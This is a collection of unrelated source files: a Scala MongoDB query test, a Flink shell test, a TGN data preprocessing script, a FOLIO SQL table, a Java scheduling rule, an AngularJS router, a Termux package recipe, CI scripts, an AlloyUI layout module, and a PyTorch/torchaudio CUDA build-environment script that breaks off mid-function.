  // Remove every SimpleRecord document before each test so counts start at zero.
  @Before
  def cleanUpMongo = {
    Await.ready(executor.bulkDelete_!!(SimpleRecord), oneS)
    ()
  }

  // Query construction only -- no database round trip.
  @Test
  def canBuildQuery: Unit = {
    (SimpleRecord: Query[SimpleRecord.type, SimpleRecord, InitialState]).toString() must_== """db.simple_records.find({ })"""
    SimpleRecord.where(_.a eqs 1).toString() must_== """db.simple_records.find({ "a" : 1})"""
  }

  // Read-only queries against an empty collection.
  @Test
  def canExecuteQuery: Unit = {
    Await.result(executor.fetch(SimpleRecord.where(_.a eqs 1)), oneS) must_== Nil
    Await.result(executor.count(SimpleRecord), oneS) must_== 0
    Await.result(executor.exists(SimpleRecord), oneS) must_== false
  }

  // Upsert one record, then verify count/fetch/exists and field projections.
  @Test
  def canUpsertAndGetResults: Unit = {
    Await.result(executor.count(SimpleRecord), oneS) must_== 0
    val x = for {
      _ <- executor.upsertOne(SimpleRecord.modify(_.a setTo 1).and(_.b setTo "foo"))
      cnt <- executor.count(SimpleRecord)
      results <- executor.fetch(SimpleRecord.where(_.a eqs 1))
      e1 <- executor.exists(SimpleRecord.where(_.a eqs 1).select(_.a))
      r1 <- executor.fetch(SimpleRecord.where(_.a eqs 1).select(_.a))
      r2 <- executor.fetch(SimpleRecord.where(_.a eqs 1).select(_.b))
      r3 <- executor.fetch(SimpleRecord.where(_.a eqs 1).select(_.a, _.b))
    } yield {
      e1 must_== true
      cnt must_== 1
      results.size must_== 1
      results(0).a must_== 1
      results(0).b must_== "foo"
      r1 must_== List(Some(1))
      r2 must_== List(Some("foo"))
      r3 must_== List((Some(1), Some("foo")))
    }
    Await.ready(x, 10 seconds)
  }
}
|
#!/usr/bin/env bash
################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
source "$(dirname "$0")"/common.sh

TEST_PROGRAM_JAR=$TEST_INFRA_DIR/../../flink-end-to-end-tests/flink-stream-sql-test/target/StreamSQLTestProgram.jar

# Tear down the cluster and undo the lib-folder change on exit.
function sql_cleanup() {
  stop_cluster
  $FLINK_DIR/bin/taskmanager.sh stop-all

  # remove flink-table from lib folder
  rm $FLINK_DIR/lib/flink-table*jar

  # make sure to run regular cleanup as well
  cleanup
}

# FIX: register the cleanup traps *before* any state is mutated. Previously
# they were installed only after the job had run, so an interrupt or failure
# during cluster startup or the flink run left the cluster and the copied
# flink-table jar behind.
trap sql_cleanup INT
trap sql_cleanup EXIT

# copy flink-table jar into lib folder
cp $FLINK_DIR/opt/flink-table*jar $FLINK_DIR/lib

start_cluster
$FLINK_DIR/bin/taskmanager.sh start
$FLINK_DIR/bin/taskmanager.sh start
$FLINK_DIR/bin/taskmanager.sh start

$FLINK_DIR/bin/flink run -p 4 $TEST_PROGRAM_JAR -outputPath $TEST_DATA_DIR/out/result

# collect results from files (completed part file plus the pending one)
cat $TEST_DATA_DIR/out/result/part-0-0 $TEST_DATA_DIR/out/result/_part-0-1.pending > $TEST_DATA_DIR/out/result-complete

# check result:
# 20,1970-01-01 00:00:00.0
# 20,1970-01-01 00:00:20.0
# 20,1970-01-01 00:00:40.0
check_result_hash "StreamSQL" $TEST_DATA_DIR/out/result-complete "b29f14ed221a936211202ff65b51ee26"
|
<gh_stars>1-10
_all__ = ["crypto_utils","myCrypto","myParser","senz_parser"] |
import json
import numpy as np
import pandas as pd
from pathlib import Path
import argparse
import logging
import time
from sklearn.preprocessing import MinMaxScaler
def preprocess(data_name):
    """Parse a raw interaction CSV into a DataFrame and an edge-feature matrix.

    Each data line is expected as: user_id, item_id, timestamp, label,
    feat_0, feat_1, ...  The first line is assumed to be a header and skipped.

    Args:
        data_name: path to the CSV file to read.

    Returns:
        (pd.DataFrame, np.ndarray): frame with columns u, i, ts, label, idx
        (idx is the 0-based data-line number) and a per-interaction feature
        matrix with one row per line.
    """
    logger.info("Loading interaction and label data...")
    u_list, i_list, ts_list, label_list = [], [], [], []
    feat_l = []
    idx_list = []

    with open(data_name) as f:
        next(f)  # skip the header row (was bound to an unused variable)
        for idx, line in enumerate(f):
            e = line.strip().split(',')
            u = int(e[0])
            i = int(e[1])
            ts = float(e[2])
            label = float(e[3])  # kept as float: some datasets use non-integer labels
            # Remaining columns form the edge feature vector.
            feat = np.array([float(x) for x in e[4:]])

            u_list.append(u)
            i_list.append(i)
            ts_list.append(ts)
            label_list.append(label)
            idx_list.append(idx)
            feat_l.append(feat)
    logger.info("Loading interaction and label data succeeded.")
    return pd.DataFrame({'u': u_list,
                         'i': i_list,
                         'ts': ts_list,
                         'label': label_list,
                         'idx': idx_list}), np.array(feat_l)
def reindex(df, bipartite=True):
    """Return a copy of the interaction frame with ids shifted to start at 1.

    For bipartite graphs, item ids are first offset past the user id range
    (so users and items occupy disjoint id ranges); then u, i and idx are all
    incremented by one so that id 0 stays free for padding. The input frame is
    not mutated.

    Args:
        df: DataFrame with columns u, i, idx (0-based, contiguous for
            bipartite inputs).
        bipartite: whether users and items are separate node sets.

    Returns:
        A reindexed copy of ``df``.
    """
    new_df = df.copy()
    if bipartite:
        # Ids must be contiguous for the offset arithmetic below to be valid.
        assert (df.u.max() - df.u.min() + 1 == len(df.u.unique()))
        assert (df.i.max() - df.i.min() + 1 == len(df.i.unique()))

        # Shift item ids past the user id range.
        upper_u = df.u.max() + 1
        new_df.i = df.i + upper_u

    # Common to both cases (was duplicated in each branch): reserve id 0.
    new_df.u += 1
    new_df.i += 1
    new_df.idx += 1

    return new_df
def run(data_name, bipartite=True):
    """Preprocess one dataset end-to-end and write the ml_* artifacts.

    Reads ./data/{name}_node_interactions.csv, reindexes the ids, and writes
    ml_{name}.csv (interactions), ml_{name}.npy (edge features, with a zero
    row prepended for the reserved id 0) and ml_{name}_node.npy (node
    features). Node features come from {name}_node_features.csv, min-max
    scaled; if that file is missing or unreadable, a zero matrix with 172
    columns is used instead.
    """
    Path("data/").mkdir(parents=True, exist_ok=True)
    PATH = './data/{}_node_interactions.csv'.format(data_name)
    PATH_NODE_FEAT = './data/{}_node_features.csv'.format(data_name)
    OUT_DF = './data/ml_{}.csv'.format(data_name)
    OUT_FEAT = './data/ml_{}.npy'.format(data_name)
    OUT_NODE_FEAT = './data/ml_{}_node.npy'.format(data_name)

    df, feat = preprocess(PATH)
    new_df = reindex(df, bipartite)

    # Prepend an all-zero feature row for the reserved id 0.
    empty = np.zeros(feat.shape[1])[np.newaxis, :]
    feat = np.vstack([empty, feat])

    # %%
    max_idx = max(new_df.u.max(), new_df.i.max())
    try:
        logger.info("Trying to load graph node features...")
        node_feat = pd.read_csv(PATH_NODE_FEAT)
        node_feat = pd.DataFrame(MinMaxScaler().fit_transform(node_feat.values), columns=node_feat.columns, index=node_feat.index).to_numpy()
        # the indices of the entities start at 1, so we need one more element for the non-existent 0 element (i.e. ml_reddit_df["u"].min() == 1)
        node_feat = np.vstack([np.zeros([max_idx + 1 - node_feat.shape[0], node_feat.shape[1]]), node_feat])
        logger.info("Loading node features succeeded.")
    except Exception as e:
        # Best-effort fallback: node features are optional, so any failure
        # (missing file, bad schema) degrades to a zero matrix.
        logger.info("Loading node features failed, loading zero matrix instead...")
        logger.info(str(e))
        node_feat = np.zeros((max_idx + 1, 172))
    # %%
    new_df.to_csv(OUT_DF)
    np.save(OUT_FEAT, feat)
    np.save(OUT_NODE_FEAT, node_feat)
if __name__ == "__main__":
    # CLI entry point: parse arguments, set up file + console logging, and
    # run the preprocessing pipeline.
    parser = argparse.ArgumentParser('Interface for TGN data preprocessing')
    parser.add_argument('--data', type=str, help='Dataset name (eg. wikipedia or reddit or your own)',
                        default='wikipedia')
    parser.add_argument('--bipartite', action='store_true', help='Whether the graph is bipartite')
    args = parser.parse_args()

    logging.basicConfig(level=logging.INFO)
    logger = logging.getLogger()
    logger.setLevel(logging.DEBUG)
    # FIX: FileHandler does not create missing directories and raised
    # FileNotFoundError on a fresh checkout without ./log.
    Path("log/").mkdir(parents=True, exist_ok=True)
    fh = logging.FileHandler('log/{}.log'.format(str(time.time())))
    fh.setLevel(logging.DEBUG)
    ch = logging.StreamHandler()
    ch.setLevel(logging.WARN)
    formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
    fh.setFormatter(formatter)
    ch.setFormatter(formatter)
    logger.addHandler(fh)
    logger.addHandler(ch)

    logger.info(args)
    logger.info(f"Preprocessing {args.data}...")
    run(args.data, bipartite=args.bipartite)
    logger.info(f"Preprocessing {args.data} data succeeded.")
<reponame>VandanaShah-Cornell/folio-analytics<gh_stars>1-10
DROP TABLE IF EXISTS folio_reporting.item_electronic_access;

-- Create table for electronic access points for item records. This includes the name of the relationship and the id.
CREATE TABLE folio_reporting.item_electronic_access AS
SELECT
    item.id AS item_id,
    item.hrid AS item_hrid,
    json_extract_path_text(electronic_access.data, 'linkText') AS link_text,
    json_extract_path_text(electronic_access.data, 'materialsSpecification') AS materials_specification,
    json_extract_path_text(electronic_access.data, 'publicNote') AS public_note,
    json_extract_path_text(electronic_access.data, 'relationshipId') AS relationship_id,
    inventory_electronic_access_relationships.name AS relationship_name,
    json_extract_path_text(electronic_access.data, 'uri') AS uri
FROM
    inventory_items AS item
    -- Unnest the electronicAccess JSON array: one output row per access point.
    CROSS JOIN json_array_elements(json_extract_path(data, 'electronicAccess')) AS electronic_access(data)
    -- Resolve the relationship id to its human-readable name (NULL if unknown).
    LEFT JOIN inventory_electronic_access_relationships ON json_extract_path_text(electronic_access.data, 'relationshipId') = inventory_electronic_access_relationships.id;

-- Indexes on every reporting column to support ad-hoc filtering.
CREATE INDEX ON folio_reporting.item_electronic_access (item_id);

CREATE INDEX ON folio_reporting.item_electronic_access (item_hrid);

CREATE INDEX ON folio_reporting.item_electronic_access (link_text);

CREATE INDEX ON folio_reporting.item_electronic_access (materials_specification);

CREATE INDEX ON folio_reporting.item_electronic_access (public_note);

CREATE INDEX ON folio_reporting.item_electronic_access (relationship_id);

CREATE INDEX ON folio_reporting.item_electronic_access (relationship_name);

CREATE INDEX ON folio_reporting.item_electronic_access (uri);
|
package yimei.jss.rule.operation.basic;
import ec.rule.Rule;
import yimei.jss.jobshop.OperationOption;
import yimei.jss.jobshop.WorkCenter;
import yimei.jss.rule.AbstractRule;
import yimei.jss.rule.RuleType;
import yimei.jss.simulation.state.SystemState;
/**
* Created by YiMei on 27/09/16.
*/
/**
 * EDD (Earliest Due Date) dispatching rule: the priority of an operation
 * option is the due date of its job. Presumably the framework favors the
 * smallest priority value so earlier due dates are scheduled first --
 * TODO confirm against AbstractRule's selection logic.
 */
public class EDD extends AbstractRule {
    /**
     * @param type whether the rule is used for sequencing or routing.
     */
    public EDD(RuleType type) {
        // NOTE(review): the name deliberately contains literal quote characters;
        // presumably expected by the rule name/expression handling -- confirm
        // before "cleaning" this up.
        name = "\"EDD\"";
        this.type = type;
    }
    /** Priority = due date of the job owning this operation option. */
    @Override
    public double priority(OperationOption op, WorkCenter workCenter, SystemState systemState) {
        return op.getJob().getDueDate();
    }
}
|
angular
    .module('app', ['ngSanitize', 'ui.router', 'templates', 'ngResource', 'ui.bootstrap'])
    .config(['$stateProvider', '$urlRouterProvider', function($stateProvider, $urlRouterProvider) {
        // Most states do not preload a recipe, but every controller injects
        // `recipeShowObject`; resolve a fresh empty object so the injection
        // always succeeds. Shared across states below to avoid repetition.
        var emptyRecipeResolve = {
            recipeShowObject: function() {
                return {};
            }
        };

        $stateProvider
            .state('home', {
                url: '/',
                templateUrl: 'home.html',
                controller: 'HomeController as vm',
                resolve: emptyRecipeResolve
            })
            .state('home.ingredients', {
                url: 'ingredients',
                templateUrl: 'ingredients.html',
                controller: 'IngredientsController as vm',
                resolve: emptyRecipeResolve
            })
            .state('home.recipes', {
                url: 'recipes',
                templateUrl: 'recipes.html',
                controller: 'RecipesController as vm',
                resolve: emptyRecipeResolve
            })
            .state('home.welcome', {
                url: 'welcome',
                templateUrl: 'welcome.html',
                controller: 'RecipesController as vm',
                resolve: emptyRecipeResolve
            })
            .state('home.recipeShow', {
                url: 'recipes/:id',
                templateUrl: 'recipeShow.html',
                controller: 'RecipesController as vm',
                resolve: {
                    // Explicit array annotation keeps this resolve
                    // minification-safe, consistent with the annotated
                    // .config() above.
                    recipeShowObject: ['$http', '$stateParams', function($http, $stateParams) {
                        return $http.get('recipes/' + $stateParams.id);
                    }]
                }
            })
            .state('home.categories', {
                url: 'categories',
                templateUrl: 'categoriesHome.html',
                controller: 'CategoriesController as vm',
                resolve: emptyRecipeResolve
            })
            .state('home.categoryShow', {
                url: 'categories/:id',
                templateUrl: 'categoryShow.html',
                controller: 'CategoriesController as vm',
                resolve: emptyRecipeResolve
            });

        // Any unknown URL falls back to the welcome page.
        $urlRouterProvider.otherwise('/welcome');
    }]);
|
# Termux package recipe (build.sh variables) for the WeeChat IRC client.
TERMUX_PKG_HOMEPAGE=https://weechat.org/
TERMUX_PKG_DESCRIPTION="Fast, light and extensible IRC chat client"
TERMUX_PKG_LICENSE="GPL-2.0"
# NOTE: VERSION, SRCURL and SHA256 must be updated together.
TERMUX_PKG_VERSION=2.4
TERMUX_PKG_REVISION=3
TERMUX_PKG_SHA256=61a6afe9849b96e99c1f3cde612d1748a03c807059dad459e3a6acbc5cf100fd
TERMUX_PKG_SRCURL=https://www.weechat.org/files/src/weechat-${TERMUX_PKG_VERSION}.tar.bz2
TERMUX_PKG_DEPENDS="libiconv, ncurses, libgcrypt, libcurl, libgnutls, libandroid-support, zlib"
# Prune files not wanted in the final package (duplicate curses binary,
# headless manpage, icons).
TERMUX_PKG_RM_AFTER_INSTALL="bin/weechat-curses share/man/man1/weechat-headless.1 share/icons"
# Extra CMake flags. The $(which ...) substitutions are evaluated on the
# build host when the recipe is sourced.
TERMUX_PKG_EXTRA_CONFIGURE_ARGS="
-DCA_FILE=$TERMUX_PREFIX/etc/tls/cert.pem
-DENABLE_HEADLESS=OFF
-DENABLE_LUA=ON
-DENABLE_MAN=ON
-DENABLE_PERL=ON
-DENABLE_PYTHON3=ON
-DENABLE_TCL=OFF
-DMSGFMT_EXECUTABLE=$(which msgfmt)
-DMSGMERGE_EXECUTABLE=$(which msgmerge)
-DPKG_CONFIG_EXECUTABLE=$(which pkg-config)
-DXGETTEXT_EXECUTABLE=$(which xgettext)
"
|
// NOTE(review): generated declaration file (see the sourceMappingURL footer);
// presumably emitted by the build -- prefer editing the component source.
import React from 'react';
/** Props for the table row component: all standard <tr> HTML attributes. */
interface Props extends React.HTMLAttributes<HTMLTableRowElement> {
}
/** Forward-ref table row; accepts Props plus a ref to the underlying <tr>. */
declare const TableRow: React.ForwardRefExoticComponent<Props & React.RefAttributes<HTMLTableRowElement>>;
export default TableRow;
//# sourceMappingURL=TableRow.d.ts.map
#!/bin/bash
# Jenkins job: mirror an image from SOURCE to TARGET via the gen3 CLI.
# checkout cloud-automation
# String parameter SOURCE
# String parameter TARGET
# GEN3_QUAY_LOGIN_PASSWORD
#   Obtained through Jenkins credentials
set -e

export KUBECTL_NAMESPACE="default"
# Point HOME at the Jenkins workspace so gen3 looks for secrets there.
export HOME="$WORKSPACE"

# Persist the Quay password where `gen3 ecr quaylogin` expects it.
# (Quoting protects against workspace paths containing spaces.)
mkdir -p "$HOME/Gen3Secrets/quay"
echo "$GEN3_QUAY_LOGIN_PASSWORD" > "$HOME/Gen3Secrets/quay/login"
ls "$HOME/Gen3Secrets/quay/login"

# setup gen3 CLI
export GEN3_HOME="$WORKSPACE/cloud-automation"
source "$GEN3_HOME/gen3/gen3setup.sh"

gen3 ecr quaylogin
gen3 ecr dh-quay "$SOURCE" "$TARGET"
#!/bin/bash
# Replace the deployed app's database.yml with a symlink to the shared
# config so every deploy reuses the same credentials.

# Go to the deployment directory; abort if it is missing so the rm/ln
# below cannot run in whatever directory we happened to start in.
cd /var/www/sample_app/deployment || exit 1

# Remove if there is an existing database configuration
rm -f config/database.yml

# Link the database configuration to shared db config file
ln -s /var/www/sample_app/shared/config/database.yml config/database.yml
<filename>med-cabinet/src/components/LogInPage.js
import React from 'react'
import Login from './Login'
const LogInPage = () => {
return(
<>
<Login />
{/* <Link to='/api-test'><button>API Test</button></Link> */}
</>
)
}
export default LogInPage |
#!/bin/bash
# Join all arguments after the first with the first argument as delimiter,
# e.g. `join_by : a b c` -> "a:b:c". Prints no trailing newline.
function join_by {
  local d=$1
  shift
  # First element is printed bare (no leading delimiter).
  echo -n "$1"
  shift
  # "${@/#/$d}" expands every remaining argument with $d prepended,
  # producing "<d>arg2<d>arg3..." in one printf call.
  printf "%s" "${@/#/$d}"
}
# Split $PATH into an array (NUL-terminated read handles the final entry),
# drop every entry containing /apollo/, then run the coverage build with
# the filtered PATH and GOPATH pointed at the workspace root.
IFS=: read -r -d '' -a path_array < <(printf '%s:\0' "$PATH")
npath=()
for p in "${path_array[@]}"; do
  # Pure-bash substring match replaces the original `echo | grep; test $?`
  # pipeline: same filtering, no subprocesses.
  if [[ "$p" != */apollo/* ]]; then
    npath+=("$p")
  fi
done
GOPATH=$(realpath $(dirname $(realpath "$0"))/../../../..) PATH=$(join_by : "${npath[@]}") make test-coverage
|
<gh_stars>100-1000
/**
 * The Layout Builder Component
 *
 * @module aui-layout-builder
 */

// CSS class and markup template for the container node the layout is drawn
// into; _createLayoutContainer() prepends this div when one is not already
// present in the host container.
var CSS_LAYOUT_BUILDER_LAYOUT_CONTAINER = A.getClassName('layout', 'builder', 'layout', 'container'),
    TPL_LAYOUT_CONTAINER = '<div class="' + CSS_LAYOUT_BUILDER_LAYOUT_CONTAINER + '"></div>';
/**
* A base class for Layout Builder.
*
* Check the [live demo](http://alloyui.com/examples/layout-builder/).
*
* @class A.LayoutBuilder
* @extends Base
* @uses A.LayoutBuilderAddCol, A.LayoutBuilderRemoveCol
* @param {Object} config Object literal specifying layout builder configuration
* properties.
* @constructor
*/
A.LayoutBuilder = A.Base.create('layout-builder', A.Base, [
    A.LayoutBuilderAddCol,
    A.LayoutBuilderMove,
    A.LayoutBuilderRemoveRow,
    A.LayoutBuilderResizeCol,
    // It's necessary that A.LayoutBuilderAddRow is the last to be loaded.
    A.LayoutBuilderAddRow
], {
    /**
     * The node where the layout will be rendered.
     *
     * @property _layoutContainer
     * @type {Node}
     * @protected
     */
    _layoutContainer: null,
    /**
     * Construction logic executed during LayoutBuilder instantiation. Lifecycle.
     *
     * @method initializer
     * @protected
     */
    initializer: function() {
        var container = this.get('container'),
            layout = this.get('layout');
        this._createLayoutContainer(container);
        // Make layout events bubble to this builder so the subscriptions
        // below fire.
        layout.addTarget(this);
        // Handles are kept so destructor() can detach them all at once.
        // NOTE(review): the move handlers are named _after* but subscribed
        // with on() rather than after() -- confirm that is intentional.
        this._eventHandles = [
            this.after('layoutChange', A.bind(this._afterLayoutChange, this)),
            this.on('moveStart', A.bind(this._afterLayoutMoveStart, this)),
            this.on('moveEnd', A.bind(this._afterLayoutMoveEnd, this))
        ];
        layout.draw(this._layoutContainer);
        // Prevent text selection while dragging pieces of the layout.
        this._layoutContainer.unselectable();
    },
    /**
     * Destructor implementation for the `A.LayoutBuilder` class. Lifecycle.
     *
     * @method destructor
     * @protected
     */
    destructor: function() {
        (new A.EventHandle(this._eventHandles)).detach();
        this.get('container').empty();
    },
    /**
     * Fires after layout:moveEnd event.
     * Restores whichever edit features were enabled before the move started
     * (saved by _afterLayoutMoveStart below).
     *
     * @method _afterLayoutMoveEnd
     * @protected
     */
    _afterLayoutMoveEnd: function() {
        if (this.isResizeColsEnabled) {
            this.set('enableResizeCols', true);
        }
        if (this.isRemoveRowsEnabled) {
            this.set('enableRemoveRows', true);
        }
        if (this.isAddRowsEnabled) {
            this.set('enableAddRows', true);
        }
    },
    /**
     * Fires after layout:moveStart event.
     * Snapshots the current edit-feature flags, then disables them so they
     * cannot interfere while a move is in progress.
     *
     * @method _afterLayoutMoveStart
     * @protected
     */
    _afterLayoutMoveStart: function() {
        this.isResizeColsEnabled = this.get('enableResizeCols');
        this.isRemoveRowsEnabled = this.get('enableRemoveRows');
        this.isAddRowsEnabled = this.get('enableAddRows');
        if (this.isResizeColsEnabled) {
            this.set('enableResizeCols', false);
        }
        if (this.isRemoveRowsEnabled) {
            this.set('enableRemoveRows', false);
        }
        if (this.isAddRowsEnabled) {
            this.set('enableAddRows', false);
        }
    },
    /**
     * Fires after layout changes.
     * Clears the container, retargets event bubbling from the old layout to
     * the new one, and redraws.
     *
     * @method _afterLayoutChange
     * @param {EventFacade} event
     * @protected
     */
    _afterLayoutChange: function(event) {
        var newLayout = event.newVal,
            prevLayout = event.prevVal;
        this._layoutContainer.empty();
        prevLayout.removeTarget(this);
        newLayout.addTarget(this);
        newLayout.draw(this._layoutContainer);
    },
    /**
     * Create layout container node.
     * Reuses an existing container child with the expected CSS class, or
     * prepends a freshly created one.
     *
     * @method _createLayoutContainer
     * @param {Node} container Node that will append the _layoutContainer node.
     * @protected
     */
    _createLayoutContainer: function(container) {
        this._layoutContainer = container.one('.' + CSS_LAYOUT_BUILDER_LAYOUT_CONTAINER);
        if (!this._layoutContainer) {
            this._layoutContainer = A.Node.create(TPL_LAYOUT_CONTAINER);
            container.prepend(this._layoutContainer);
        }
    }
}, {
    /**
     * Static property used to define the default attribute
     * configuration for LayoutBuilder.
     *
     * @property ATTRS
     * @type Object
     * @static
     */
    ATTRS: {
        /**
         * Node that that will be inserted the layout.
         *
         * @attribute container
         * @type {String | Node}
         * @initOnly
         */
        container: {
            setter: A.one,
            validator: function(val) {
                return A.Lang.isString(val) || A.instanceOf(val, A.Node);
            },
            writeOnce: 'initOnly'
        },
        /**
         * Object with layout configuration.
         *
         * @attribute layout
         * @type {A.Layout}
         */
        layout: {
            validator: function(val) {
                return A.instanceOf(val, A.Layout);
            },
            valueFn: function() {
                return new A.Layout();
            }
        },
        /**
         * Collection of strings used to label elements of the UI.
         *
         * @attribute strings
         * @type {Object}
         */
        strings: {
            value: {
                addColumn: 'Add Column',
                addRow: 'Add Row',
                pasteHere: 'Paste Here'
            },
            writeOnce: true
        }
    }
});
|
# A set of useful bash functions for common functionality we need to do in
# many build scripts
# Setup CUDA environment variables, based on CU_VERSION
#
# Inputs:
# CU_VERSION (cpu, cu92, cu100)
# NO_CUDA_PACKAGE (bool)
# BUILD_TYPE (conda, wheel)
#
# Outputs:
# VERSION_SUFFIX (e.g., "")
# PYTORCH_VERSION_SUFFIX (e.g., +cpu)
# WHEEL_DIR (e.g., cu100/)
# CUDA_HOME (e.g., /usr/local/cuda-9.2, respected by torch.utils.cpp_extension)
# USE_CUDA (respected by torchaudio setup.py)
# NVCC_FLAGS (respected by torchaudio setup.py)
#
# Precondition: CUDA versions are installed in their conventional locations in
# /usr/local/cuda-*
#
# NOTE: Why VERSION_SUFFIX versus PYTORCH_VERSION_SUFFIX? If you're building
# a package with CUDA on a platform we support CUDA on, VERSION_SUFFIX ==
# PYTORCH_VERSION_SUFFIX and everyone is happy. However, if you are building a
# package with only CPU bits (e.g., torchaudio), then VERSION_SUFFIX is always
# empty, but PYTORCH_VERSION_SUFFIX is +cpu (because that's how you get a CPU
# version of a Python package. But that doesn't apply if you're on OS X,
# since the default CU_VERSION on OS X is cpu.
# Point CUDA_HOME at the conventional install location for CUDA version "$1"
# (e.g. "11.5"), handling both Windows (msys) and Linux layouts.
_setup_cuda_home() {
  if [[ "$OSTYPE" == "msys" ]]; then
    export CUDA_HOME="C:\\Program Files\\NVIDIA GPU Computing Toolkit\\CUDA\\v$1"
  else
    export CUDA_HOME="/usr/local/cuda-$1/"
  fi
}

# Set up CUDA environment variables from CU_VERSION; see the header comment
# above for the full input/output contract.
setup_cuda() {
  # First, compute version suffixes. By default, assume no version suffixes
  export VERSION_SUFFIX=""
  export PYTORCH_VERSION_SUFFIX=""
  export WHEEL_DIR="cpu/"
  # Wheel builds need suffixes (but not if they're on OS X, which never has suffix)
  if [[ "$BUILD_TYPE" == "wheel" ]] && [[ "$(uname)" != Darwin ]]; then
    export PYTORCH_VERSION_SUFFIX="+$CU_VERSION"
    # Match the suffix scheme of pytorch, unless this package does not have
    # CUDA builds (in which case, use default)
    if [[ -z "$NO_CUDA_PACKAGE" ]]; then
      export VERSION_SUFFIX="$PYTORCH_VERSION_SUFFIX"
      export WHEEL_DIR="$CU_VERSION/"
    fi
  fi
  # Now work out the CUDA settings: CUDA_HOME plus the GPU architectures
  # supported by that toolkit release.
  case "$CU_VERSION" in
    cu115)
      _setup_cuda_home 11.5
      export TORCH_CUDA_ARCH_LIST="3.5;5.0+PTX;6.0;7.0;7.5;8.0;8.6"
      ;;
    cu113)
      _setup_cuda_home 11.3
      export TORCH_CUDA_ARCH_LIST="3.5;5.0+PTX;6.0;7.0;7.5;8.0;8.6"
      ;;
    cu112)
      _setup_cuda_home 11.2
      export TORCH_CUDA_ARCH_LIST="3.5;5.0+PTX;6.0;7.0;7.5;8.0;8.6"
      ;;
    cu111)
      _setup_cuda_home 11.1
      export TORCH_CUDA_ARCH_LIST="3.5;5.0+PTX;6.0;7.0;7.5;8.0;8.6"
      ;;
    cu110)
      _setup_cuda_home 11.0
      export TORCH_CUDA_ARCH_LIST="3.5;5.0+PTX;6.0;7.0;7.5;8.0"
      ;;
    cu102)
      _setup_cuda_home 10.2
      export TORCH_CUDA_ARCH_LIST="3.5;5.0+PTX;6.0;7.0;7.5"
      ;;
    cu101)
      _setup_cuda_home 10.1
      export TORCH_CUDA_ARCH_LIST="3.5;5.0+PTX;6.0;7.0;7.5"
      ;;
    cu100)
      # CUDA <= 10.0 had no Windows branch in this script, so set the
      # Linux path directly.
      export CUDA_HOME=/usr/local/cuda-10.0/
      export TORCH_CUDA_ARCH_LIST="3.5;5.0+PTX;6.0;7.0;7.5"
      ;;
    cu92)
      export CUDA_HOME=/usr/local/cuda-9.2/
      export TORCH_CUDA_ARCH_LIST="3.5;5.0+PTX;6.0;7.0"
      ;;
    rocm*)
      export USE_ROCM=1
      ;;
    cpu)
      ;;
    *)
      echo "Unrecognized CU_VERSION=$CU_VERSION"
      exit 1
      ;;
  esac
  if [[ -n "$CUDA_HOME" ]]; then
    # Adds nvcc binary to the search path so that CMake's `find_package(CUDA)` will pick the right one
    export PATH="$CUDA_HOME/bin:$PATH"
    export USE_CUDA=1
  fi
}
# Populate build version if necessary, and add version suffix
#
# Inputs:
# BUILD_VERSION (e.g., 0.2.0 or empty)
# VERSION_SUFFIX (e.g., +cpu)
#
# Outputs:
# BUILD_VERSION (e.g., 0.2.0.dev20190807+cpu)
#
# Fill BUILD_VERSION if it doesn't exist already with a nightly string
# Usage: setup_build_version 0.2.0
# Populate BUILD_VERSION (appending VERSION_SUFFIX); when no BUILD_VERSION
# is preset, synthesize a dated nightly from the base version in "$1".
setup_build_version() {
  if [[ -n "$BUILD_VERSION" ]]; then
    # Explicit version requested: just append the platform suffix.
    export BUILD_VERSION="$BUILD_VERSION$VERSION_SUFFIX"
  else
    # No version given: build "<base>.dev<YYYYMMDD><suffix>".
    local nightly_date
    nightly_date="$(date "+%Y%m%d")"
    export BUILD_VERSION="$1.dev$nightly_date$VERSION_SUFFIX"
  fi
}
# Set some useful variables for OS X, if applicable
# On macOS force the clang toolchain; on every other OS leave CC/CXX alone.
setup_macos() {
  [[ "$(uname)" != Darwin ]] && return 0
  export CC=clang
  export CXX=clang++
}
# Top-level entry point for things every package will need to do
#
# Usage: setup_env 0.2.0
# Top-level entry point every package build calls once; "$1" is the base
# version passed through to setup_build_version.
setup_env() {
  # Make sure vendored submodules are present before anything builds.
  git submodule update --init --recursive
  # Order matters: setup_cuda exports VERSION_SUFFIX, which
  # setup_build_version consumes.
  setup_cuda
  setup_build_version "$1"
  setup_macos
}
# Function to retry functions that sometimes timeout or have flaky failures
# Retry a flaky command up to five times with growing back-off (1/2/4/8 s).
# Uses quoted "$@" -- the original unquoted $* re-split arguments, so any
# argument containing whitespace was passed incorrectly on every attempt.
retry () {
  "$@" || (sleep 1 && "$@") || (sleep 2 && "$@") || (sleep 4 && "$@") || (sleep 8 && "$@")
}
# Inputs:
# PYTHON_VERSION (2.7, 3.5, 3.6, 3.7)
# UNICODE_ABI (bool)
#
# Outputs:
# PATH modified to put correct Python version in PATH
#
# Precondition: If Linux, you are in a soumith/manylinux-cuda* Docker image
# Put the requested PYTHON_VERSION first in PATH for wheel builds.
# macOS/Windows: create a throwaway conda env. Linux: rely on the
# manylinux image's /opt/python/<abi> layout (see precondition above).
setup_wheel_python() {
  if [[ "$(uname)" == Darwin || "$OSTYPE" == "msys" ]]; then
    eval "$(conda shell.bash hook)"
    # Recreate the env from scratch; ignore failure if it did not exist.
    conda env remove -n "env$PYTHON_VERSION" || true
    conda create -yn "env$PYTHON_VERSION" python="$PYTHON_VERSION"
    conda activate "env$PYTHON_VERSION"
    conda install --quiet -y pkg-config 'ffmpeg>=4.1'
  else
    # Map the version to a manylinux CPython ABI directory name.
    case "$PYTHON_VERSION" in
      2.7)
        # Two 2.7 ABIs exist; UNICODE_ABI selects the wide-unicode build.
        if [[ -n "$UNICODE_ABI" ]]; then
          python_abi=cp27-cp27mu
        else
          python_abi=cp27-cp27m
        fi
        ;;
      3.5) python_abi=cp35-cp35m ;;
      3.6) python_abi=cp36-cp36m ;;
      3.7) python_abi=cp37-cp37m ;;
      3.8) python_abi=cp38-cp38 ;;
